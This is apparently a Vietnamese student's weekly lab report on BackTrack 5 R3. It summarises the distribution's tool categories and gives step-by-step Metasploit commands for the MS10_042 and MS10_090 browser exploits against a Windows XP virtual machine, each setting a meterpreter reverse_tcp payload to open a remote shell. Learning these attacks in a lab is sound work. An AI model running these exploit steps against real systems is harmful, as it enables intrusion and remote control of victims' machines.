1. Họ Tên: Đỗ Liên Hán
Trường: Đại Học Quốc Tế
Báo Cáo Tuần 1
Các Vấn Đề Của Tuần Thứ 1:
1.Nhận tài liệu và gặp giáo viên hướng dẫn
2.Cài đặt backtrack 5r3
3.Thực hành làm quen với backtrack qua 2 lỗi
MS10_090 và MS10_042
2. I. Backtrack là gì?
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm
thâm nhập. Trong các định dạng Live DVD, có thể sử dụng Backtrack trực tiếp từ DVD
hoặc cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh
chóng cho việc tìm kiếm và cập nhật cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch
sử phát triển qua nhiều bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối
Slackware Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ
kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như sau:
Information gathering: Sử dụng để có được thông tin liên quan đến một mục tiêu DNS, địa
chỉ email, trang web, máy chủ mail….
Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về
hệ điều hành, ứng dụng được sử dụng bởi mục tiêu….
Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và
Simple Network Management Protocol (SNMP).
Web application analysis: Theo dõi, giám sát các ứng dụng web.
Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến
(RFID).
Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục
tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền.
Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền
cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để duy trì quyền truy cập.
Voice Over IP (VOIP): Các công cụ để phân tích VOIP.
Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start
Backtrack Forensics trong trình đơn khởi động.
Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.
3. II. Các bước thực hiện lỗi MS10_042 và MS10_090:
a. Lỗi MS10_042:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole.
3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1) Set srvhost [IP của máy backtrack]
(2) Set lhost [IP của máy backtrack]
(3) Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit.
b. Lỗi MS10_090:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole.
3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_090_ie_css_clip.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1) Set srvhost [IP của máy backtrack]
(2) Set lhost [IP của máy backtrack]
(3) Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit.
Demo cho 2 lỗi trên tại link:
MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg
MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw